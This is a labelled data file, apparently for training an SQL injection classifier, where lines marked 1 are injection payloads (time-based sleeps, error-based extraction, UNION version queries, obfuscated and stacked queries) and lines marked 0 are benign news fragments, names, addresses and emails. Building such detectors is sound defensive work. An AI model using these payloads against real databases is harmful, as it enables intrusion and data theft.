Supporters changes NYPD &apos;s stop-and-frisk program say changes end unfair practices , mold trusted effective police force affect police departments use policy	0
OR 4695=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)	1
1' ) ) as jvwq where 6596 = 6596 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --	1
Really , guy get death penalty anybody	0
chassigneux.tekurarere3@truecatucasa.gg	0
1 ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 5215 = 5215	1
calvin@espaciodelpintor.by	0
tiege.comptom@informatica2009.cv	0
adams@11horas.ng	0
avellanosa de mu	0
1' ) ) as myws where 5274 = 5274	1
-8133' ) union all select 6417,6417,6417,6417,6417,6417,6417,6417--	1
29p0r2en9e7c87	0
oli4c5r	0
1'|| ( select 'votg' where 5105 = 5105 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --	1
Globe-trotting jet sellers even carry tape measures check competing layouts	0
When GDF-Suez plant added network , around 5 million tonnes coal imports per year realistic	0
reilly-pidgeon@interpretacion-diccionario-y-significado-de-los-s	0
The Mayor considers right decision Winterlingen handed responsibility building someone else winter , thus longer pay upkeep building , heating , tending garden clearing pavement	0
cu25439y	0
diviu sauleda	0
The residents Bischof-Freundorfer-Weg reported car wrapped toilet paper wheel trims stolen	0
logroo	0
ameller	0
plaza pont 47, 6?e	0
Click image gallery performance &quot; singing mountain wave &quot;	0
1" where 9521 = 9521 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --	1
"/**/WHeRE/**/7800=7800/**/anD/**/Sleep(5)#	1
5n37do	0
bergad faix	0
35936056m	0
inclemente	0
konstanc	0
1" ) ) as vxkn where 2443 = 2443 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --	1
))/**/As/**/OPnu/**/WHeRE/**/7705=7705/**/RlIkE/**/SlEEp(5)#	1
6onc+hesta	0
camino del caliero, 75	0
1'+ ( select ukwc where 3008 = 3008 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #	1
14724400f	0
'))/**/AnD/**/sLeep(5)/**/AnD/**/(('YqxS'='YqxS	1
19371	0
1%" ) ) or sleep ( 5 ) and ( ( "%" = "	1
6091962407544317	0
velov@expozaragozafloral2014.ac	0
amodeo sidany	0
1%" ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #	1
mercedes	0
1 ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --	1
"))) AND 9393=7399 AND ((("UMIQ"="UMIQ	1
-7786' ) ) or 9323 = 9323#	1
-7511 ) ) as xqzf where 9939 = 9939 union all select 9939,9939,9939,9939,9939,9939,9939--	1
1 ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) )	1
")))/**/oR/**/SLEEp(5)/**/ANd/**/((("clCJ"/**/lIKE/**/"clCJ	1
arseniato	0
Such growing controversy surrounding agency prompted early speculation tonight &apos;s incident result targeted cyber operation	0
0992218178104844	0
select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( "gzhp" = "gzhp	1
-6118 union all select 5906,5906,5906,5906,5906#	1
-5962 ) ) as jbqv where 2583 = 2583 or 7496 = 8560--	1
However , repertoire also includes emotive waltzes full big band sound	0
' or 0 = 0 --	1
-6085 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )	1
select * from users where id = 1.<@. union select 1,version ( ) -- 1	1
select * from users where id = '1' or $ . = 1 union select 1,@@VERSION -- 1'	1
calle villalon 13 1g	0
c/ aira de villaescusa 199, 1f	0
The specific figures must calculated municipal energy cmpany inform customers precise price increase next week	0
-8824%' ) ) or make_set ( 9354 = 9354,7185 ) and ( ( '%' = '	1
66	0
diocles	0
paseo constitucion, 10,	0
malh5jo	0
1 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )	1
1" ) union all select null,null,null,null#	1
chuck	0
waitfor delay '0:0:5' and ( ( ( 'ywnm' = 'ywnm	1
reason@cajucar.br	0
1 ) ) ) and 9575 = 1640--	1
1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and 'kudh' like 'kudh	1
martn de yeltes	0
branchadell arribas	0
`/**/whErE/**/7072=7072;beGin/**/DBMS_LOCK.SLEEp(5);/**/ENd--	1
pon38ra1l9	0
-7559" or 8792 = 6905--	1
c/ san mariano 168	0
Password: -7711')) OR 7795=7795	1
vernn	0
24830	0
7828706714204414	0
The U	0
35715294c	0
1' in boolean mode ) and elt ( 1210 = 1210,sleep ( 5 ) ) #	1
Email: (SELECT 5391 FROM PG_SLEEP(5))	1
28108650m	0
asermonada	0
The building changed hands &quot; appropriate &quot; price	0
-8546' union all select 4729,4729,4729,4729,4729,4729,4729,4729,4729#	1
weatherhead_calandra9@velaconsultores.au	0
))/**/oR/**/8146=(seLECt/**/cOunt(*)/**/froM/**/SYSMASTER:SYSPAGHDR)/**/anD/**/((2539=2539	1
faucette	0
/**/HAviNg/**/4044=4669	1
Password: (sEleCT/**/chAR(113)+chAR(98)+chAR(106)+chAR(120)+chAR(113)+(cASe/**/WheN/**/(7086=7086)/**/tHEn/**/chAR(49)/**/eLse/**/chAR(48)/**/End)+chAR(113)+chAR(122)+chAR(113)+chAR(113)+chAR(113))	1
tierra 17	0
48600	0
9173442177715818	0
21335513t	0
1" ) where 1330 = 1330 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --	1
1%" ) ) and make_set ( 8403 = 8403,8899 ) and ( ( "%" = "	1
1 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --	1
9167	0
-9810' ) where 4361 = 4361 or elt ( 1032 = 1032,3623 ) --	1
Email: -7576")) AS UMOO WHERE 3437=3437 OR 6268=5982-- GUMu	1
1' and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and 'gzlz' like 'gzlz	1
1' ) ) ) and elt ( 9041 = 6421,6421 ) and ( ( ( 'ixxg' like 'ixxg	1
wara	0
58193627q	0
3933219208280602	0
desacertadamente	0
This week I reading portion book describing Obama suffered huge loss Clinton Pennsylvania primary	0
2672	0
brassell	0
descrieres@enibiza.com.ac	0
1" ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( "tfso" = "tfso	1
Email: -9999' OR 4589=5797#	1
1" ) ) as hfma where 2654 = 2654 and make_set ( 8403 = 8403,8899 ) --	1
1'+ ( select 'wpnm' where 8223 = 8223 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ) +'	1
select * from users where id = 1 +$+ union select null,@@VERSION -- 1	1
1 where 6095 = 6095 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --	1
')))/**/aNd/**/9344=5375--/**/Zcgu	1
alidia	0
tapia de casariego	0
35141479d	0
1'+ ( select vvet where 5221 = 5221 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) +'	1
1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'lshk' like 'lshk	1
Besides coal imports , Rhenus Midgard also active field wind park logistics , among ventures	0
)/**/ANd/**/3116=(SeLeCT/**/3116/**/frOM/**/Pg_SleeP(5))--/**/YrFq	1
select ( case when ( 9732 = 7136 ) then 9732 else 9732* ( select 9732 from information_schema.character_sets ) end ) #	1
That &apos;s lot ironic hotdog dogs	0
1' ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'lxoc' = 'lxoc	1
cimorro	0
'))) AND SLEEP(5)#	1
-7272" ) union all select 9163,9163,9163,9163,9163,9163,9163--	1
"))/**/aND/**/6644=(sElEcT/**/(CASe/**/whEN/**/(6644=2274)/**/theN/**/6644/**/eLsE/**/(sElEcT/**/2274/**/UNiON/**/sElEcT/**/2131)/**/End))--/**/KPTc	1
admin" ) or ( "1" = "1	1
r8mio34	0
fitness	0
zoldou@stainless.tw	0
"))) OR NOT 3833=1948 AND ((("hEtq"="hEtq	1
1" ) where 5491 = 5491	1
Nine month-old cocker spaniel Ruby run involved road crash Sunday afternoon survived three days alone rescued quarry Wednesday	0
organero	0
1' where 4334 = 4334 or elt ( 5873 = 5873,sleep ( 5 ) ) #	1
It loves realities creators, names customs	0
frutos	0
6256677835346457	0
) AS voNh WHERE 3405=3405;WAITFOR DELAY '0:0:5'-- thQM	1
-6803" ) order by 1#	1
However , lead singer Alex Turner &apos;s illness forced reschedule show	0
-9672' ) ) as rupb where 8218 = 8218 or make_set ( 4954 = 1836,1836 ) --	1
")));(SeLect/**/*/**/fRoM/**/(SeLect(SLeEp(5)))qUCI)/**/AnD/**/((("YuhR"/**/LiKE/**/"YuhR	1
Email: -8206"))/**/aS/**/hkFL/**/wherE/**/6201=6201/**/Or/**/9238=6122--/**/ELnD	1
kemr@soycatalan.ga	0
c/ universidad laboral 193,	0
1' ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( 'sucj' = 'sucj	1
1%' ) ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --	1
paseo don juan de borbon 90 3?c	0
or pg_sleep ( __TIME__ ) --	1
+(SeLect/**/kPsz/**/WhErE/**/5527=5527/**/anD/**/3769=2687)+	1
)) AND 6939=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) AND ((5980=5980	1
42808198t	0
whipple	0
arksikainen_simor@paremoselalzheimer.vi	0
1 ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( 1748 = 1748	1
' AND 1 = utl_inaddr.get_host_address ( ( SELECT global_name FROM global_name ) ) AND 'i' = 'i	1
1%' ) ) ) union all select null,null,null,null,null,null--	1
chasse	0
1" ) where 8254 = 8254 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --	1
wernher	0
1%" ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( "%" = "	1
24410	0
6702564951251728	0
29320	0
-7083" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and "ajcl" like "ajcl	1
baryshnikov@lola-lutscht.es	0
select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1	1
289	0
')) AS hdiT WHERE 8088=8088 HAVING 6828=6828-- LbAp	1
Now , mid-fifties , Waltraud Ries different thoughts	0
`=`emanuel@gmail.com`;iF(3572=2666)/**/SElect/**/3572/**/elSe/**/Drop/**/FuNctIoN/**/ZXgW--	1
The conclusions poll come surprise many	0
catete	0
-9923%' ) ) ) union all select 8985,8985,8985,8985,8985,8985,8985#	1
1 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) # jpau	1
The new law &apos;t require parents declare gender children , allowing parents declare gender &quot; undetermined &quot; &quot; unspecified &quot; birth certificates	0
c/ guardia civil, 90,	0
Email: -2063")/**/aS/**/BQZA/**/wheRE/**/1633=1633/**/oRDER/**/bY/**/2058--/**/ZVHD	1
For comparison &apos;s sake , ratio United States one doctor every 413 people	0
Email: -3869/**/WherE/**/6335=6335/**/Or/**/6242=(selEct/**/(CAsE/**/WhEn/**/(6242=4350)/**/thEn/**/6242/**/ElSe/**/(selEct/**/4350/**/uNiON/**/selEct/**/2305)/**/ENd))--/**/WShH	1
1' ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( 'eqfh' = 'eqfh	1
'))/**/Or/**/(seLEct/**/5652/**/fRoM/**/(seLEct(SleEP(5)))TIIA)/**/aND/**/(('FZaM'='FZaM	1
kariann	0
'))/**/anD/**/2178=(SeLECT/**/2178/**/fROM/**/pG_SlEeP(5))--	1
Aircraft electronic device rules stay force Australia Australian airline passengers need continue turning tablets smart phones take-off landing despite moves US loosen regulations covering devices	0
1'1	1
rasche2@cirugiaparpado.de	0
select ( case when ( 4780 = 4432 ) then 4780 else 4780* ( select 4780 from mysql.db ) end ) #	1
)/**/rLIKE/**/(seleCT/**/8349/**/frOM/**/(seleCT(sLEEP(5)))WNzd)#	1
However , new orders announced coming months , suspect market become skeptical program	0
6753518387589503	0
villavaquern	0
But depressed knowing something wrong , demanded medical records	0
38847166m	0
`)/**/wHERe/**/3679=3679/**/Or/**/3757=(SElEcT/**/3757/**/frOm/**/Pg_sLEep(5))--/**/ZjPJ	1
An extra one-time annual levy could imposed drivers hybrids others whose vehicles &apos;t use much gas , pay fair share	0
urrucha comallonga	0
13590	0
c/ jacinto benavente 109, 10?d	0
In Dick &apos;s world , alarmingly similar , mutants look future - police access insight	0
"))) AND 5163 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5163=5163) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113))) AND ((("rkTV" LIKE "rkTV	1
else dbms_lock.sleep ( 0 )	1
"))/**/As/**/ifMV/**/WhErE/**/6376=6376/**/WAITFOR/**/DELAY/**/'0:0:5'--/**/zcxx	1
( select ( case when ( 1570 = 6977 ) then 1 else 1570* ( select 1570 from mysql.db ) end ) )	1
96761343k	0
25320	0
1" ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( "vfoh" = "vfoh	1
1" ) where 4913 = 4913	1
select ( case when ( 3537 = 5218 ) then 3537 else 3537* ( select 3537 from mysql.db ) end ) #	1
')) AND SLEEP(5) AND (('klde'='klde	1
The paper structured follows: Section 2 conducts survey related work	0
select * from generate_series ( 7754,7754,case when ( 7754 = 1252 ) then 1 else 0 end ) limit 1--	1
ceseri@discotecateatre.do	0
villafufre	0
42193	0
37905890g	0
select sleep ( 5 ) -- hlgt	1
c/ grabador david roberts 154 1-h	0
6537476325760255	0
38182378d	0
")))/**/Or/**/nOT/**/7048=2800--/**/YPdr	1
2812685253359971	0
")/**/oR/**/nOt/**/5472=1851/**/aNd/**/("mPfk"="mPfk	1
8651552740405089	0
1'|| ( select 'mnvk' from dual where 4181 = 4181	1
durbahn	0
1'|| ( select 'rawn' from dual where 4988 = 4988 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) ) ||'	1
ilya	0
1' where 3701 = 3701 and 2006 = 2006	1
-9197%" ) ) ) union all select 1040,1040,1040,1040,1040,1040,1040,1040,1040#	1
lindt38	0
-7037' ) ) as epsg where 3684 = 3684 union all select 3684--	1
rabascall	0
")));SELECT CASE WHEN 5133=1158 THEN 1 ELSE NULL END--	1
"));SELECT (CASE WHEN (3811=3811) THEN 3811 ELSE 1/(SELECT 0) END)--	1
The target &quot; missiles related equipment &quot; , Israeli government feared intended Lebanese Hezbollah , according CNN	0
1%' ) ) ) and 2006 = 2006	1
e7ato	0
sunyer lleix	0
1'|| ( select 'setd' from dual where 3686 = 3686 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) ) ||'	1
boniquet jeria	0
419747iv6	0
The administration said come surprise 5 percent population purchase insurance may forced switch plans coverage &apos;t meet new standards required Affordable Care Act	0
S	0
) ) ;waitfor delay '0:0:__TIME__'--	1
hoya-gonzalo	0
select * from users where id = 1 union select @<@.,version ( ) -- 1	1
murero	0
1" waitfor delay '0:0:5' and "syhx" = "syhx	1
1 ) ) as msug where 3503 = 3503 and sleep ( 5 ) #	1
hinwood-laretei@addl.es	0
;IF(9210=2374) SELECT 9210 ELSE DROP FUNCTION NjLq--	1
" or "" "	1
9227	0
Email: -9126"/**/Or/**/4805=4805--/**/KycW	1
moneder-a	0
1' ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --	1
But Berlin longer needs Paris passport political legitimacy imposed economic policy Europe , leaving battered French economy struggling	0
4673726880012931	0
%' HAVING 4452=7024 AND 'sjme%'='sjme	1
-8093" ) ) as oboi where 1476 = 1476 union all select 1476,1476,1476,1476#	1
S	0
6351	0
6448	0
gussack.reinecke@eddydaniele.pt	0
c/ bandera 125 8-c	0
`)/**/whEre/**/1857=1857;seleCt/**/(CAsE/**/whEn/**/(9621=8185)/**/THEn/**/1/**/Else/**/9621*(seleCt/**/9621/**/UNIoN/**/aLL/**/seleCt/**/8185)/**/enD)--	1
1" ) where 7588 = 7588 waitfor delay '0:0:5'--	1
6839	0
This also applies case victims	0
x' AND 1 = ( SELECT COUNT ( * ) FROM tabname ) ; --	1
1%' ) ) and 7533 = 7533 and ( ( '%' = '	1
`=`emanuel@gmail.com`;sElecT/**/PG_sleep(5)--	1
1' and ( 3020 = 3020 ) *6703 and 'qsrz' = 'qsrz	1
Email: -9470') AS toEm WHERE 5362=5362 OR 8196=(SELECT (CASE WHEN (8196=8196) THEN 8196 ELSE (SELECT 1521 UNION SELECT 8706) END))-- NomE	1
select * from users where id = 1 or ".{" or 1 = 1 -- 1	1
di lorenzo	0
gourtchenko@cirujanaplastica.nl	0
1' ) as cgsz where 7194 = 7194 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --	1
A study aiming increase benefits Scotland HS2 rail project announced UK government	0
co8mov8mi886o	0
' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (2629=2629) THEN 0x656d616e75656c40676d61696c2e636f6d ELSE 0x28 END))#	1
-9240' union all select 6538,6538,6538#	1
1' ) as yxdb where 4597 = 4597	1
inconse_cuente	0
36914497a	0
busoms redolad	0
selk@inversioneolica.ee	0
"));SELECT CASE WHEN 3200=3200 THEN 1 ELSE NULL END--	1
91	0
)) AS czZa WHERE 4105=4105;SELECT CASE WHEN 6584=5188 THEN 1 ELSE NULL END--	1
ziemba	0
rutilant+e	0
huayraruna	0
end and ( 'nchh' = 'nchh	1
48310	0
villahermosa del ro	0
'/**/Or/**/slEeP(5)/**/Or/**/'vQiz'='WTQX	1
And heavier devices laptops continue stowed concern might injure someone go flying around cabin	0
')/**/aNd/**/1848=(selECt/**/(CAsE/**/whEn/**/(1848=9211)/**/ThEn/**/1848/**/elSe/**/(selECt/**/9211/**/uNiOn/**/selECt/**/2064)/**/EnD))--/**/byUk	1
5264009665543297	0
â or 3 = 3 --	1
ribera vitols	0
-3186 or 3867 = 9405	1
casa de la misericordia 12	0
gamarnik9	0
Email: -8891")) ORDER BY 9848-- YQeX	1
/**/AnD/**/3116=(SElECT/**/3116/**/FrOM/**/pg_sleEp(5))#/**/QbUR	1
Mr Alderson , Keighley , added: &quot; We scared might fall stayed	0
calle profeta, 96, 2?c	0
55950989q	0
p5r0i9i5ar	0
san martn del castaar	0
or 0 = 0 #	1
1' ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( 'wfws' = 'wfws	1
";BegIn/**/DBMS_LOCK.sLEEP(5);/**/eNd/**/ANd/**/"JvsC"="JvsC	1
3227728964471059	0
31392	0
8715	0
1'|| ( select 'flbv' where 7451 = 7451 and 4595 = 4595#	1
dion0843co	0
-6145 or ( 8459 = 8459 ) *4906-- yklv	1
create or replace function sleep ( int ) returns int as '/lib/libc.so.6','sleep' language 'c' strict	1
04212893y	0
domains_	0
)/**/HAvIng/**/4385=1961/**/anD/**/(1725=1725	1
1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'ukzb' = 'ukzb	1
They produced hard-fought two-hour match	0
"/**/aND/**/2142=3448--/**/UfJc	1
1 ) as attr where 8085 = 8085 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --	1
huari	0
1'|| ( select 'dpce' from dual where 5261 = 5261 union all select null,null,null,null,null,null--	1
calle gibraltar, 88	0
-7741' ) where 8271 = 8271 union all select 8271,8271,8271,8271,8271,8271,8271#	1
48099287p	0
ros	0
24152	0
abs hosta	0
versini@clubdecampo.com.bi	0
avinguda ragull 103, 2?f	0
pedralba de la pradera	0
OR SLEEP(5)	1
-8609' union all select 9384,9384,9384,9384--	1
')/**/Or/**/NoT/**/2188=9755/**/AnD/**/('rSBl'='rSBl	1
0076747388160328	0
-6942' ) union all select 7280,7280,7280#	1
chiarell1	0
ve60u10	0
1' where 2690 = 2690	1
15280766a	0
';SelEct/**/(CASe/**/WhEN/**/(2568=5385)/**/ThEn/**/2568/**/eLSE/**/1/(SelEct/**/0)/**/eNd)--	1
`/**/WherE/**/9062=9062/**/aND/**/6728=(sELecT/**/(cAsE/**/When/**/(6728=2833)/**/TheN/**/6728/**/eLSE/**/(sELecT/**/2833/**/uNIoN/**/sELecT/**/4253)/**/eNd))--/**/DOXx	1
1o510426	0
1 where 3799 = 3799 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --	1
80216904b	0
torres de barbus	0
1' ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( 'ichh' like 'ichh	1
38036492n	0
-1639 ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 3318 = 3318	1
')/**/anD/**/(sELecT/**/6924/**/fROm/**/(sELecT(sLEeP(5)))BtNs)#	1
colote	0
sonoe	0
")/**/As/**/Wdzr/**/wHErE/**/1336=1336/**/anD/**/1696=3302#	1
lovegrov	0
select * from users where id = 1 or "{;" or 1 = 1 -- 1	1
47gent1r	0
aimarsen@enla.gi	0
1'+ ( select ijoh where 7145 = 7145 order by 1--	1
x' AND userid IS NULL; --	1
select * from users where id = 1 + \+%$ or 1 = 1 -- 1	1
96527161w	0
Only half dozen President &apos;s closest advisers -- including Daley , former Obama campaign chief Jim Messina , former White House senior advisers David Axelrod David Plouffe -- knew change consideration	0
Email: -2810"))/**/oR/**/1445=4660--/**/SFHK	1
87	0
1%' ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --	1
17rgu1r7	0
06314426y	0
piols padilla	0
van_mete2	0
His efforts finally pull fish surface water genuine members audience forget sea question consists merely water bottles , illuminated blue	0
It &apos;s mystery I yet solve	0
05782219l	0
pancracia	0
waitfor delay '0:0:5' and "cvqn" like "cvqn	1
"/**/WHEre/**/2291=2291/**/rLikE/**/Sleep(5)--/**/iyae	1
")/**/oR/**/6836=(SELECt/**/6836/**/froM/**/pg_SLEeP(5))/**/anD/**/("CXIu"/**/lIKE/**/"CXIu	1
"))/**/HaViNG/**/5093=5093/**/anD/**/(("PxcR"/**/LIKe/**/"PxcR	1
pintarrajar	0
1%' ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --	1
OR 8824=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)--	1
1%" ) ) or sleep ( 5 ) #	1
Password: -2361") OR 5186=5388 AND ("RUhZ"="RUhZ	1
-3782%" ) or make_set ( 9354 = 9354,7185 ) and ( "%" = "	1
paula pladellorens	0
1' ) ) as hfra where 6500 = 6500 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --	1
pockett_miguelin@noviasteresapalacios.aw	0
1' where 5458 = 5458 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #	1
";(sElect/**/*/**/FrOm/**/(sElect(SLeeP(5)))vjsp)/**/AnD/**/"QfXf"="QfXf	1
1' ) as ybuv where 9641 = 9641 union all select null,null,null,null,null,null,null,null--	1
A single dose vaccine able protect mice nicotine addiction life	0
select * from users where id = 1 or 1#"@ union select null,version ( ) -- 1	1
1133130881623845	0
1' ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'xdce' = 'xdce	1
union all select @@version--	1
16	0
sierra del gudar 98,	0
33423	0
Password: -6298"))) OR 5192=5192 AND ((("COpL"="COpL	1
73spojador	0
'))) AND 4068=5695#	1
guciz	0
mallki	0
In country , African-American Hispanic girls tend reach puberty earlier white counterparts	0
Email: -5963' WHERE 6446=6446 OR 2159=5642-- WTKB	1
Are traditional e-mails read third parties journey net ? The majority e-mails read several times software robots en route recipient	0
'/**/wHERE/**/5049=5049/**/Or/**/SLEep(5)#	1
7297834291786721	0
Every manufacturer schedules different way	0
1%' ) union all select null,null,null,null,null#	1
%'/**/RLikE/**/(sELEcT/**/(casE/**/WhEn/**/(1150=1761)/**/thEn/**/0x7061737373/**/eLsE/**/0x28/**/eNd))/**/aND/**/'YHbw%'='YHbw	1
12312	0
))/**/As/**/JsMA/**/WHEre/**/1247=1247;If(5550=9621)/**/sElEcT/**/5550/**/ElSE/**/drOp/**/fUnctIoN/**/MLPB--	1
1" ) ) ) or sleep ( 5 ) and ( ( ( "hdis" like "hdis	1
1" ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( "hbgr" like "hbgr	1
bosier@opel-e-flex.bn	0
agam1	0
torremacana, 107 7e	0
1" where 7158 = 7158	1
1' ) ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 'jzpb' = 'jzpb	1
16806738v	0
However , evenly matched game , great physical effort Marcus Blasutto &apos;s TSV team proved decisive spite tremendous commitment teams	0
Password: (sELEct/**/(Case/**/When/**/(9441=9903)/**/ThEn/**/9441/**/eLse/**/9441*(sELEct/**/9441/**/UNioN/**/ALl/**/sELEct/**/9903)/**/eNd))	1
1%" ) ) rlike sleep ( 5 ) and ( ( "%" = "	1
Some world &apos;s largest banks , including UBS , Barclays , Deutsche Bank RBS , confirmed co-operating regulators investigations world &apos;s largest financial market , $ 5	0
45295566x	0
select sleep ( 5 ) and ( ( ( "lczw" = "lczw	1
17103014f	0
